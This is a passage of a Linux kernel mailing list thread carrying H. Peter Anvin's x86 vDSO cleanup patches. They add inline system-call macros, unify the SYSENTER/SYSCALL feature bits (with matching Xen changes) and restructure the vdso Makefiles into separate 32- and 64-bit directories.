- "rcx", "r11");
-
- return ret;
+ return VDSO_SYSCALL2(clock_getres,_time64,_clkid,_ts);
}
-#else
-
-static __always_inline
-long clock_gettime_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
-{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_gettime64), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
+#ifndef CONFIG_X86_64
static __always_inline
long clock_gettime32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_gettime), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
-
-static __always_inline
-long gettimeofday_fallback(struct __kernel_old_timeval *_tv,
- struct timezone *_tz)
-{
- long ret;
-
- asm(
- "mov %%ebx, %%edx \n"
- "mov %2, %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret)
- : "0" (__NR_gettimeofday), "g" (_tv), "c" (_tz)
- : "memory", "edx");
-
- return ret;
+ return VDSO_SYSCALL2(clock_gettime,,_clkid,_ts);
}
static __always_inline long
-clock_getres_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
-{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_getres_time64), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
-
-static __always_inline
-long clock_getres32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
+clock_getres32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_getres), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
+ return VDSO_SYSCALL2(clock_getres,,_clkid,_ts);
}
#endif
diff --git a/arch/x86/include/asm/vdso/sys_call.h b/arch/x86/include/asm/vdso/sys_call.h
new file mode 100644
index 000000000000..dcfd17c6dd57
--- /dev/null
+++ b/arch/x86/include/asm/vdso/sys_call.h
@@ -0,0 +1,103 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Macros for issuing an inline system call from the vDSO.
+ */
+
+#ifndef X86_ASM_VDSO_SYS_CALL_H
+#define X86_ASM_VDSO_SYS_CALL_H
+
+#include <linux/compiler.h>
+#include <asm/cpufeatures.h>
+#include <asm/alternative.h>
+
+#ifdef CONFIG_X86_64
+# define __sys_instr "syscall"
+# define __sys_clobber "rcx", "r11", "memory"
+# define __sys_nr(x,y) __NR_ ## x
+# define __sys_reg1 "rdi"
+# define __sys_reg2 "rsi"
+# define __sys_reg3 "rdx"
+# define __sys_reg4 "r10"
+# define __sys_reg5 "r8"
+#else
+# define __sys_instr "call __kernel_vsyscall"
+# define __sys_clobber "memory"
+# define __sys_nr(x,y) __NR_ ## x ## y
+# define __sys_reg1 "ebx"
+# define __sys_reg2 "ecx"
+# define __sys_reg3 "edx"
+# define __sys_reg4 "esi"
+# define __sys_reg5 "edi"
+#endif
+
+/*
+ * Example usage:
+ *
+ * result = VDSO_SYSCALL3(foo,64,x,y,z);
+ *
+ * ... calls foo(x,y,z) on 64 bits, and foo64(x,y,z) on 32 bits.
+ *
+ * VDSO_SYSCALL6() is currently missing, because it would require
+ * special handling for %ebp on 32 bits when the vdso is compiled with
+ * frame pointers enabled (the default on 32 bits.) Add it as a special
+ * case when and if it becomes necessary.
+ */
+#define _VDSO_SYSCALL(name,suf32,...) \
+ ({ \
+ long _sys_num_ret = __sys_nr(name,suf32); \
+ asm_inline volatile( \
+ __sys_instr \
+ : "+a" (_sys_num_ret) \
+ : __VA_ARGS__ \
+ : __sys_clobber); \
+ _sys_num_ret; \
+ })
+
+#define VDSO_SYSCALL0(name,suf32) \
+ _VDSO_SYSCALL(name,suf32)
+#define VDSO_SYSCALL1(name,suf32,a1) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1)); \
+ })
+#define VDSO_SYSCALL2(name,suf32,a1,a2) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2)); \
+ })
+#define VDSO_SYSCALL3(name,suf32,a1,a2,a3) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3)); \
+ })
+#define VDSO_SYSCALL4(name,suf32,a1,a2,a3,a4) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ register long _sys_arg4 asm(__sys_reg4) = (long)(a4); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3), "r" (_sys_arg4)); \
+ })
+#define VDSO_SYSCALL5(name,suf32,a1,a2,a3,a4,a5) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ register long _sys_arg4 asm(__sys_reg4) = (long)(a4); \
+ register long _sys_arg5 asm(__sys_reg5) = (long)(a5); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3), "r" (_sys_arg4), \
+ "r" (_sys_arg5)); \
+ })
+
+#endif /* X86_ASM_VDSO_SYS_CALL_H */
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:26:02 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
In most cases, the use of "fast 32-bit system call" depends either on
X86_FEATURE_SEP or X86_FEATURE_SYSENTER32 || X86_FEATURE_SYSCALL32.
However, nearly all the logic for both is identical.
Define X86_FEATURE_SYSFAST32, which indicates that *either* SYSENTER32 or
SYSCALL32 should be used, on either 32- or 64-bit kernels. This
defaults to SYSENTER; SYSCALL is used if the SYSCALL32 bit is also set.
As this removes ALL existing uses of X86_FEATURE_SYSENTER32, which is
a kernel-only synthetic feature bit, simply remove it and replace it
with X86_FEATURE_SYSFAST32.
This leaves an unused alternative for a true 32-bit kernel, but that
should really not matter in any way.
The clearing of X86_FEATURE_SYSCALL32 can be removed once the patches
for automatically clearing disabled features have been merged.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/Kconfig.cpufeatures | 8 +++++++
arch/x86/entry/vdso/vdso32/system_call.S | 8 ++-----
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/kernel/cpu/centaur.c | 3 ---
arch/x86/kernel/cpu/common.c | 8 +++++++
arch/x86/kernel/cpu/intel.c | 4 +---
arch/x86/kernel/cpu/zhaoxin.c | 4 +---
arch/x86/kernel/fred.c | 2 +-
arch/x86/xen/setup.c | 28 +++++++++++++++---------
arch/x86/xen/smp_pv.c | 5 ++---
arch/x86/xen/xen-ops.h | 1 -
11 files changed, 42 insertions(+), 31 deletions(-)
diff --git a/arch/x86/Kconfig.cpufeatures b/arch/x86/Kconfig.cpufeatures
index 733d5aff2456..423ac795baa7 100644
--- a/arch/x86/Kconfig.cpufeatures
+++ b/arch/x86/Kconfig.cpufeatures
@@ -56,6 +56,10 @@ config X86_REQUIRED_FEATURE_MOVBE
def_bool y
depends on MATOM
+config X86_REQUIRED_FEATURE_SYSFAST32
+ def_bool y
+ depends on X86_64 && !X86_FRED
+
config X86_REQUIRED_FEATURE_CPUID
def_bool y
depends on X86_64
@@ -120,6 +124,10 @@ config X86_DISABLED_FEATURE_CENTAUR_MCR
def_bool y
depends on X86_64
+config X86_DISABLED_FEATURE_SYSCALL32
+ def_bool y
+ depends on !X86_64
+
config X86_DISABLED_FEATURE_PCID
def_bool y
depends on !X86_64
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index 2a15634bbe75..7b1c0f16e511 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -52,13 +52,9 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
-#ifdef BUILD_VDSO32_64
/* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
- ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSENTER32, \
- SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
-#else
- ALTERNATIVE "", SYSENTER_SEQUENCE, X86_FEATURE_SEP
-#endif
+ ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSFAST32, \
+ SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
/* Enter using int $0x80 */
int $0x80
diff --git a/arch/x86/include/asm/cpufeatures.h b/arch/x86/include/asm/cpufeatures.h
index c3b53beb1300..63b0f9aa9b3e 100644
--- a/arch/x86/include/asm/cpufeatures.h
+++ b/arch/x86/include/asm/cpufeatures.h
@@ -84,7 +84,7 @@
#define X86_FEATURE_PEBS ( 3*32+12) /* "pebs" Precise-Event Based Sampling */
#define X86_FEATURE_BTS ( 3*32+13) /* "bts" Branch Trace Store */
#define X86_FEATURE_SYSCALL32 ( 3*32+14) /* syscall in IA32 userspace */
-#define X86_FEATURE_SYSENTER32 ( 3*32+15) /* sysenter in IA32 userspace */
+#define X86_FEATURE_SYSFAST32 ( 3*32+15) /* sysenter/syscall in IA32 userspace */
#define X86_FEATURE_REP_GOOD ( 3*32+16) /* "rep_good" REP microcode works well */
#define X86_FEATURE_AMD_LBR_V2 ( 3*32+17) /* "amd_lbr_v2" AMD Last Branch Record Extension Version 2 */
#define X86_FEATURE_CLEAR_CPU_BUF ( 3*32+18) /* Clear CPU buffers using VERW */
diff --git a/arch/x86/kernel/cpu/centaur.c b/arch/x86/kernel/cpu/centaur.c
index a3b55db35c96..9833f837141c 100644
--- a/arch/x86/kernel/cpu/centaur.c
+++ b/arch/x86/kernel/cpu/centaur.c
@@ -102,9 +102,6 @@ static void early_init_centaur(struct cpuinfo_x86 *c)
(c->x86 >= 7))
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#endif
if (c->x86_power & (1 << 8)) {
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC);
diff --git a/arch/x86/kernel/cpu/common.c b/arch/x86/kernel/cpu/common.c
index e7ab22fce3b5..1c3261cae40c 100644
--- a/arch/x86/kernel/cpu/common.c
+++ b/arch/x86/kernel/cpu/common.c
@@ -1068,6 +1068,9 @@ void get_cpu_cap(struct cpuinfo_x86 *c)
init_scattered_cpuid_features(c);
init_speculation_control(c);
+ if (IS_ENABLED(CONFIG_X86_64) || cpu_has(c, X86_FEATURE_SEP))
+ set_cpu_cap(c, X86_FEATURE_SYSFAST32);
+
/*
* Clear/Set all flags overridden by options, after probe.
* This needs to happen each time we re-probe, which may happen
@@ -1813,6 +1816,11 @@ static void __init early_identify_cpu(struct cpuinfo_x86 *c)
* that it can't be enabled in 32-bit mode.
*/
setup_clear_cpu_cap(X86_FEATURE_PCID);
+
+ /*
+ * Never use SYSCALL on a 32-bit kernel
+ */
+ setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
#endif
/*
diff --git a/arch/x86/kernel/cpu/intel.c b/arch/x86/kernel/cpu/intel.c
index 98ae4c37c93e..646ff33c4651 100644
--- a/arch/x86/kernel/cpu/intel.c
+++ b/arch/x86/kernel/cpu/intel.c
@@ -236,9 +236,7 @@ static void early_init_intel(struct cpuinfo_x86 *c)
clear_cpu_cap(c, X86_FEATURE_PSE);
}
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#else
+#ifndef CONFIG_X86_64
/* Netburst reports 64 bytes clflush size, but does IO in 128 bytes */
if (c->x86 == 15 && c->x86_cache_alignment == 64)
c->x86_cache_alignment = 128;
diff --git a/arch/x86/kernel/cpu/zhaoxin.c b/arch/x86/kernel/cpu/zhaoxin.c
index 89b1c8a70fe8..031379b7d4fa 100644
--- a/arch/x86/kernel/cpu/zhaoxin.c
+++ b/arch/x86/kernel/cpu/zhaoxin.c
@@ -59,9 +59,7 @@ static void early_init_zhaoxin(struct cpuinfo_x86 *c)
{
if (c->x86 >= 0x6)
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
-#ifdef CONFIG_X86_64
- set_cpu_cap(c, X86_FEATURE_SYSENTER32);
-#endif
+
if (c->x86_power & (1 << 8)) {
set_cpu_cap(c, X86_FEATURE_CONSTANT_TSC);
set_cpu_cap(c, X86_FEATURE_NONSTOP_TSC);
diff --git a/arch/x86/kernel/fred.c b/arch/x86/kernel/fred.c
index 816187da3a47..e736b19e18de 100644
--- a/arch/x86/kernel/fred.c
+++ b/arch/x86/kernel/fred.c
@@ -68,7 +68,7 @@ void cpu_init_fred_exceptions(void)
idt_invalidate();
/* Use int $0x80 for 32-bit system calls in FRED mode */
- setup_clear_cpu_cap(X86_FEATURE_SYSENTER32);
+ setup_clear_cpu_cap(X86_FEATURE_SYSFAST32);
setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
}
diff --git a/arch/x86/xen/setup.c b/arch/x86/xen/setup.c
index 3823e52aef52..ac8021c3a997 100644
--- a/arch/x86/xen/setup.c
+++ b/arch/x86/xen/setup.c
@@ -990,13 +990,6 @@ static int register_callback(unsigned type, const void *func)
return HYPERVISOR_callback_op(CALLBACKOP_register, &callback);
}
-void xen_enable_sysenter(void)
-{
- if (cpu_feature_enabled(X86_FEATURE_SYSENTER32) &&
- register_callback(CALLBACKTYPE_sysenter, xen_entry_SYSENTER_compat))
- setup_clear_cpu_cap(X86_FEATURE_SYSENTER32);
-}
-
void xen_enable_syscall(void)
{
int ret;
@@ -1008,11 +1001,27 @@ void xen_enable_syscall(void)
mechanism for syscalls. */
}
- if (cpu_feature_enabled(X86_FEATURE_SYSCALL32) &&
- register_callback(CALLBACKTYPE_syscall32, xen_entry_SYSCALL_compat))
+ if (!cpu_feature_enabled(X86_FEATURE_SYSFAST32))
+ return;
+
+ if (cpu_feature_enabled(X86_FEATURE_SYSCALL32)) {
+ /* Use SYSCALL32 */
+ ret = register_callback(CALLBACKTYPE_syscall32,
+ xen_entry_SYSCALL_compat);
+
+ } else {
+ /* Use SYSENTER32 */
+ ret = register_callback(CALLBACKTYPE_sysenter,
+ xen_entry_SYSENTER_compat);
+ }
+
+ if (ret) {
setup_clear_cpu_cap(X86_FEATURE_SYSCALL32);
+ setup_clear_cpu_cap(X86_FEATURE_SYSFAST32);
+ }
}
+
static void __init xen_pvmmu_arch_setup(void)
{
HYPERVISOR_vm_assist(VMASST_CMD_enable, VMASST_TYPE_writable_pagetables);
@@ -1022,7 +1031,6 @@ static void __init xen_pvmmu_arch_setup(void)
register_callback(CALLBACKTYPE_failsafe, xen_failsafe_callback))
BUG();
- xen_enable_sysenter();
xen_enable_syscall();
}
diff --git a/arch/x86/xen/smp_pv.c b/arch/x86/xen/smp_pv.c
index 9bb8ff8bff30..c40f326f0c3a 100644
--- a/arch/x86/xen/smp_pv.c
+++ b/arch/x86/xen/smp_pv.c
@@ -65,10 +65,9 @@ static void cpu_bringup(void)
touch_softlockup_watchdog();
/* PVH runs in ring 0 and allows us to do native syscalls. Yay! */
- if (!xen_feature(XENFEAT_supervisor_mode_kernel)) {
- xen_enable_sysenter();
+ if (!xen_feature(XENFEAT_supervisor_mode_kernel))
xen_enable_syscall();
- }
+
cpu = smp_processor_id();
identify_secondary_cpu(cpu);
set_cpu_sibling_map(cpu);
diff --git a/arch/x86/xen/xen-ops.h b/arch/x86/xen/xen-ops.h
index 090349baec09..f6c331b20fad 100644
--- a/arch/x86/xen/xen-ops.h
+++ b/arch/x86/xen/xen-ops.h
@@ -60,7 +60,6 @@ phys_addr_t __init xen_find_free_area(phys_addr_t size);
char * __init xen_memory_setup(void);
void __init xen_arch_setup(void);
void xen_banner(void);
-void xen_enable_sysenter(void);
void xen_enable_syscall(void);
void xen_vcpu_restore(void);
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 16 Dec 2025 13:26:03 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
|
- Separate out the vdso sources into common, vdso32, and vdso64
directories.
- Build the 32- and 64-bit vdsos in their respective subdirectories;
this greatly simplifies the build flags handling.
- Unify the mangling of Makefile flags between the 32- and 64-bit
vdso code as much as possible; all common rules are put in
arch/x86/entry/vdso/common/Makefile.include. The remaining per-directory
Makefile is very simple for 32 bits; the 64-bit one is only slightly more
complicated because it contains the x32 generation rule.
- Define __DISABLE_EXPORTS when building the vdso. This need seems to
have been masked by a different ordering of compile flags before.
- Change CONFIG_X86_64 to BUILD_VDSO32_64 in vdso32/system_call.S,
to make it compatible with including fake_32bit_build.h.
- The -fcf-protection= option was "leaking" from the kernel build,
for reasons that were not clear to me. Furthermore, several
distributions ship with it set to a default value other than
"-fcf-protection=none". Make it match the configuration options
for *user space*.
Note that this patch may seem large, but the vast majority of it is
simply code movement.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
---
arch/x86/entry/vdso/Makefile | 161 +-----------------
arch/x86/entry/vdso/common/Makefile.include | 89 ++++++++++
.../entry/vdso/{vdso-note.S => common/note.S} | 5 +-
.../entry/vdso/{ => common}/vclock_gettime.c | 0
.../entry/vdso/{ => common}/vdso-layout.lds.S | 0
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/system_call.S | 2 +-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 +++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
.../x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
21 files changed, 180 insertions(+), 186 deletions(-)
create mode 100644 arch/x86/entry/vdso/common/Makefile.include
rename arch/x86/entry/vdso/{vdso-note.S => common/note.S} (62%)
rename arch/x86/entry/vdso/{ => common}/vclock_gettime.c (100%)
rename arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S (100%)
rename arch/x86/entry/vdso/{ => common}/vgetcpu.c (100%)
create mode 100644 arch/x86/entry/vdso/vdso32/Makefile
create mode 100644 arch/x86/entry/vdso/vdso64/Makefile
create mode 100644 arch/x86/entry/vdso/vdso64/note.S
create mode 100644 arch/x86/entry/vdso/vdso64/vclock_gettime.c
rename arch/x86/entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} (94%)
rename arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S (92%)
create mode 100644 arch/x86/entry/vdso/vdso64/vgetcpu.c
rename arch/x86/entry/vdso/{ => vdso64}/vgetrandom-chacha.S (100%)
rename arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c (91%)
rename arch/x86/entry/vdso/{ => vdso64}/vsgx.S (100%)
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index 3d9b09f00c70..987b43fd4cd3 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -3,159 +3,10 @@
# Building vDSO images for x86.
#
-# Include the generic Makefile to check the built vDSO:
-include $(srctree)/lib/vdso/Makefile.include
+# Regular kernel objects
+obj-y := vma.o extable.o
+obj-$(CONFIG_COMPAT_32) += vdso32-setup.o
-# Files to link into the vDSO:
-vobjs-y := vdso-note.o vclock_gettime.o vgetcpu.o vgetrandom.o vgetrandom-chacha.o
-vobjs32-y := vdso32/note.o vdso32/system_call.o vdso32/sigreturn.o
-vobjs32-y += vdso32/vclock_gettime.o vdso32/vgetcpu.o
-vobjs-$(CONFIG_X86_SGX) += vsgx.o
-
-# Files to link into the kernel:
-obj-y += vma.o extable.o
-
-# vDSO images to build:
-obj-$(CONFIG_X86_64) += vdso64-image.o
-obj-$(CONFIG_X86_X32_ABI) += vdsox32-image.o
-obj-$(CONFIG_COMPAT_32) += vdso32-image.o vdso32-setup.o
-
-vobjs := $(addprefix $(obj)/, $(vobjs-y))
-vobjs32 := $(addprefix $(obj)/, $(vobjs32-y))
-
-$(obj)/vdso.o: $(obj)/vdso.so
-
-targets += vdso.lds $(vobjs-y)
-targets += vdso32/vdso32.lds $(vobjs32-y)
-
-targets += $(foreach x, 64 x32 32, vdso-image-$(x).c vdso$(x).so vdso$(x).so.dbg)
-
-CPPFLAGS_vdso.lds += -P -C
-
-VDSO_LDFLAGS_vdso.lds = -m elf_x86_64 -soname linux-vdso.so.1 \
- -z max-page-size=4096
-
-$(obj)/vdso64.so.dbg: $(obj)/vdso.lds $(vobjs) FORCE
- $(call if_changed,vdso_and_check)
-
-VDSO2C = $(objtree)/arch/x86/tools/vdso2c
-
-quiet_cmd_vdso2c = VDSO2C $@
- cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
-
-$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(VDSO2C) FORCE
- $(call if_changed,vdso2c)
-
-#
-# Don't omit frame pointers for ease of userspace debugging, but do
-# optimize sibling calls.
-#
-CFL := $(PROFILING) -mcmodel=small -fPIC -O2 -fasynchronous-unwind-tables -m64 \
- $(filter -g%,$(KBUILD_CFLAGS)) -fno-stack-protector \
- -fno-omit-frame-pointer -foptimize-sibling-calls \
- -DDISABLE_BRANCH_PROFILING -DBUILD_VDSO
-
-ifdef CONFIG_MITIGATION_RETPOLINE
-ifneq ($(RETPOLINE_VDSO_CFLAGS),)
- CFL += $(RETPOLINE_VDSO_CFLAGS)
-endif
-endif
-
-$(vobjs): KBUILD_CFLAGS := $(filter-out $(PADDING_CFLAGS) $(CC_FLAGS_LTO) $(CC_FLAGS_CFI) $(RANDSTRUCT_CFLAGS) $(KSTACK_ERASE_CFLAGS) $(GCC_PLUGINS_CFLAGS) $(RETPOLINE_CFLAGS),$(KBUILD_CFLAGS)) $(CFL)
-$(vobjs): KBUILD_AFLAGS += -DBUILD_VDSO
-
-#
-# vDSO code runs in userspace and -pg doesn't help with profiling anyway.
-#
-CFLAGS_REMOVE_vclock_gettime.o = -pg
-CFLAGS_REMOVE_vdso32/vclock_gettime.o = -pg
-CFLAGS_REMOVE_vgetcpu.o = -pg
-CFLAGS_REMOVE_vdso32/vgetcpu.o = -pg
-CFLAGS_REMOVE_vsgx.o = -pg
-CFLAGS_REMOVE_vgetrandom.o = -pg
-
-#
-# X32 processes use x32 vDSO to access 64bit kernel data.
-#
-# Build x32 vDSO image:
-# 1. Compile x32 vDSO as 64bit.
-# 2. Convert object files to x32.
-# 3. Build x32 VDSO image with x32 objects, which contains 64bit codes
-# so that it can reach 64bit address space with 64bit pointers.
-#
-
-CPPFLAGS_vdsox32.lds = $(CPPFLAGS_vdso.lds)
-VDSO_LDFLAGS_vdsox32.lds = -m elf32_x86_64 -soname linux-vdso.so.1 \
- -z max-page-size=4096
-
-# x32-rebranded versions
-vobjx32s-y := $(vobjs-y:.o=-x32.o)
-
-# same thing, but in the output directory
-vobjx32s := $(addprefix $(obj)/, $(vobjx32s-y))
-
-# Convert 64bit object file to x32 for x32 vDSO.
-quiet_cmd_x32 = X32 $@
- cmd_x32 = $(OBJCOPY) -O elf32-x86-64 $< $@
-
-$(obj)/%-x32.o: $(obj)/%.o FORCE
- $(call if_changed,x32)
-
-targets += vdsox32.lds $(vobjx32s-y)
-
-$(obj)/%.so: OBJCOPYFLAGS := -S --remove-section __ex_table
-$(obj)/%.so: $(obj)/%.so.dbg FORCE
- $(call if_changed,objcopy)
-
-$(obj)/vdsox32.so.dbg: $(obj)/vdsox32.lds $(vobjx32s) FORCE
- $(call if_changed,vdso_and_check)
-
-CPPFLAGS_vdso32/vdso32.lds = $(CPPFLAGS_vdso.lds)
-VDSO_LDFLAGS_vdso32.lds = -m elf_i386 -soname linux-gate.so.1
-
-KBUILD_AFLAGS_32 := $(filter-out -m64,$(KBUILD_AFLAGS)) -DBUILD_VDSO
-$(obj)/vdso32.so.dbg: KBUILD_AFLAGS = $(KBUILD_AFLAGS_32)
-$(obj)/vdso32.so.dbg: asflags-$(CONFIG_X86_64) += -m32
-
-KBUILD_CFLAGS_32 := $(filter-out -m64,$(KBUILD_CFLAGS))
-KBUILD_CFLAGS_32 := $(filter-out -mcmodel=kernel,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out -fno-pic,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out -mfentry,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(RANDSTRUCT_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(KSTACK_ERASE_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(GCC_PLUGINS_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(RETPOLINE_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(CC_FLAGS_LTO),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(CC_FLAGS_CFI),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(PADDING_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 += -m32 -msoft-float -mregparm=0 -fpic
-KBUILD_CFLAGS_32 += -fno-stack-protector
-KBUILD_CFLAGS_32 += $(call cc-option, -foptimize-sibling-calls)
-KBUILD_CFLAGS_32 += -fno-omit-frame-pointer
-KBUILD_CFLAGS_32 += -DDISABLE_BRANCH_PROFILING
-KBUILD_CFLAGS_32 += -DBUILD_VDSO
-
-ifdef CONFIG_MITIGATION_RETPOLINE
-ifneq ($(RETPOLINE_VDSO_CFLAGS),)
- KBUILD_CFLAGS_32 += $(RETPOLINE_VDSO_CFLAGS)
-endif
-endif
-
-$(obj)/vdso32.so.dbg: KBUILD_CFLAGS = $(KBUILD_CFLAGS_32)
-
-$(obj)/vdso32.so.dbg: $(obj)/vdso32/vdso32.lds $(vobjs32) FORCE
- $(call if_changed,vdso_and_check)
-
-#
-# The DSO images are built using a special linker script.
-#
-quiet_cmd_vdso = VDSO $@
- cmd_vdso = $(LD) -o $@ \
- $(VDSO_LDFLAGS) $(VDSO_LDFLAGS_$(filter %.lds,$(^F))) \
- -T $(filter %.lds,$^) $(filter %.o,$^)
-
-VDSO_LDFLAGS = -shared --hash-style=both --build-id=sha1 --no-undefined \
- $(call ld-option, --eh-frame-hdr) -Bsymbolic -z noexecstack
-
-quiet_cmd_vdso_and_check = VDSO $@
- cmd_vdso_and_check = $(cmd_vdso); $(cmd_vdso_check)
+# vDSO directories
+obj-$(CONFIG_X86_64) += vdso64/
+obj-$(CONFIG_COMPAT_32) += vdso32/
